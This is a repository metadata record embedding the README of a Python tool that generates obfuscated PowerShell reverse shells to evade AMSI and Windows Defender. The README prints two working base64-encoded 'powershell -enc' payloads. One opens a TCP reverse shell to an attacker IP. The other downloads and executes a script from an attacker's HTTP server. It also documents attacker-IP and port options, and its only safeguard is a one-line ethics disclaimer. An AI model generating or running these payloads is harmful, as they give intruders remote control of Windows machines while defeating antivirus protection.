{"id":18084094,"url":"https://github.com/gunzf0x/bypassamsi_psrevshell","last_synced_at":"2025-04-05T23:42:27.550Z","repository":{"id":260215747,"uuid":"880609478","full_name":"gunzf0x/BypassAMSI_PSRevshell","owner":"gunzf0x","description":"Simple obfuscated PowerShell revshell generator to bypass AMSI / Windows Defender","archived":false,"fork":false,"pushed_at":"2024-12-20T10:23:57.000Z","size":7,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-05T23:42:22.693Z","etag":null,"topics":["amsi-bypass","defender-bypass","obfuscate","obfuscation","pentesting","powershell","python","python3","red-team","red-teaming","reverse-shell","revshell"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gunzf0x.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-10-30T02:45:29.000Z","updated_at":"2025-02-09T20:08:00.000Z","dependencies_parsed_at":"2024-10-30T07:41:00.546Z","dependency_job_id":null,"html_url":"https://github.com/gunzf0x/BypassAMSI_PSRevshell","commit_stats":null,"previous_names":["gunzf0x/bypassamsi_psrevshell"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gunzf0x%2FBypassAMSI_PSRevshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gunzf0x%2FBypassAMSI_PSRevshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gunzf0x%2FBypassAMSI_PSRevshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gunzf0x%2FBypassAMSI_PSRevshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/gunzf0x","download_url":"https://codeload.github.com/gunzf0x/BypassAMSI_PSRevshell/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247415928,"owners_count":20935385,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["amsi-bypass","defender-bypass","obfuscate","obfuscation","pentesting","powershell","python","python3","red-team","red-teaming","reverse-shell","revshell"],"created_at":"2024-10-31T15:05:42.366Z","updated_at":"2025-04-05T23:42:27.533Z","avatar_url":"https://github.com/gunzf0x.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# BypassAMSI PowerShell Revshell\n\n---\n\n## \"Revshell\" command\nGenerates an obfuscated `PowerShell` reverse shell payload based on original [Nishang Reverse shell PS oneliner](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1).\n\n### Usage\n```shell-session\npython3 BypassAMSI_PSRevshell.py revshell -i \u003cAttacker-IP\u003e -p \u003clistening-port\u003e\n```\n\nFor example:\n```shell-session\n❯ python3 BypassAMSI_PSRevshell.py revshell -i 10.10.10.10 -p 4444\n```\n\nWill generate the payload:\n```powershell\npowershell -enc JABjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAxADAALgAxADAALgAxADAAJwAsADQANAA0ADQAKQA7ACQAcwAgAD0AIAAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMALgBSAGUAYQBkACgAJABiACwAIAAwACwAIAAkAGIALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIALAAwACwAIAAkAGkAKQA7ACQAcwBiACAAPQAgACgAaQBlAHgAIAAkAGQAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGIAMgAgACAAPQAgACQAcwBiACAAKwAgACcAUABTACAAJwAgACsAIAAnAD4AIAAnADsAJABzAHkAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAyACkAOwAkAHMALgBXAHIAaQB0AGUAKAAkAHMAeQAsADAALAAkAHMAeQAuAEwAZQBuAGcAdABoACkAOwAkAHMALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMALgBDAGwAbwBzAGUAKAApAA==\n```\n\n---\n\n## \"Server\" command\nThis option will create a payload file, by default named `revshell.ps1` (which is the obfuscated payload from `revshell` command written into a file), and expose it into a temporal HTTP server (by default on port `8000`, which can be changed as well). The script will then generate an encoded payload that will request the file to the temporal server, executes it and triggers the reverse shell.\n\n### Usage\n```shell-session\npython3 BypassAMSI_PSRevshell.py server -i \u003cAttacker-IP\u003e -p \u003clistening-port\u003e\n```\n\nFor example:\n```shell-session\n❯ python3 BypassAMSI_PSRevshell.py server -i 10.10.10.10 -p 4444 --server-port 9000\n```\nWill generate the payload:\n```powershell\npowershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEAMAAuADEAMAA6ADkAMAAwADAALwByAGUAdgBzAGgAZQBsAGwALgBwAHMAMQAiACkA\n```\nExecuting it on the victim machine will make a request to the HTTP server exposed and the payload file.\n\n---\n\n## Help message\n```shell-session\n❯ python3 BypassAMSI_PSRevshell.py revshell -h\n\nusage: python3 BypassAMSI_PSRevshell.py revshell [-h] -i ATTACKER_IP -p PORT [-v] [--keep-pwd] [--enc-b64] [--no-banner]\n\nGenerate an obfuscated PowerShell payload to avoid Windows Defender\n\noptions:\n  -h, --help            show this help message and exit\n  -i ATTACKER_IP, --attacker-ip ATTACKER_IP\n                        Attacker IP address.\n  -p PORT, --port PORT  Port to get revshell.\n  -v, --verbose         Display payloads used and generated, along with some extra info.\n  --keep-pwd            Revshell obtained will show working directory/path. Keeping this might trigger AMSI/Defender.\n  --enc-b64             Encode in base64 the Attacker IP address and port provided to the payload.\n  --no-banner           Do not print script banner.\n\nExample: BypassAMSI_PSRevshell.py revshell -i 10.10.16.98 -p 4444\n```\n\n```shell-session\n❯ python3 BypassAMSI_PSRevshell.py server -h\n\nusage: python3 BypassAMSI_PSRevshell.py server [-h] -i ATTACKER_IP -p PORT [--server-port SERVER_PORT] [-o OUTFILE] [-v] [--keep-pwd] [--keep-file] [--enc-b64]\n                                               [--no-banner]\n\nGenerate an obfuscated PowerShell payload to avoid Windows Defender\n\noptions:\n  -h, --help            show this help message and exit\n  -i ATTACKER_IP, --attacker-ip ATTACKER_IP\n                        Attacker IP address serving temporal HTTP server.\n  -p PORT, --port PORT  Listening port to get reverse shell.\n  --server-port SERVER_PORT\n                        Port serving temporal HTTP server. Default: 8000.\n  -o OUTFILE, --outfile OUTFILE\n                        Name of the temporal PowerShell file storing obfuscated payload. Default: revshell.ps1\n  -v, --verbose         Display payloads used and generated, along with some extra info.\n  --keep-pwd            Revshell obtained will show working directory/path. Keeping this might trigger AMSI/Defender.\n  --keep-file           This script will create a file named as \"--outfile\" flag and then is deleted. Use this flag if you want to keep the generated file/payload.\n  --enc-b64             Encode in base64 the Attacker IP address and port provided to the payload.\n  --no-banner           Do not print script banner.\n\nExample: BypassAMSI_PSRevshell.py server -i 10.10.16.98\n```\n\n---\n\n## Disclaimer\nAlways use it under your own responsability. Be ethical (:\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgunzf0x%2Fbypassamsi_psrevshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgunzf0x%2Fbypassamsi_psrevshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgunzf0x%2Fbypassamsi_psrevshell/lists"}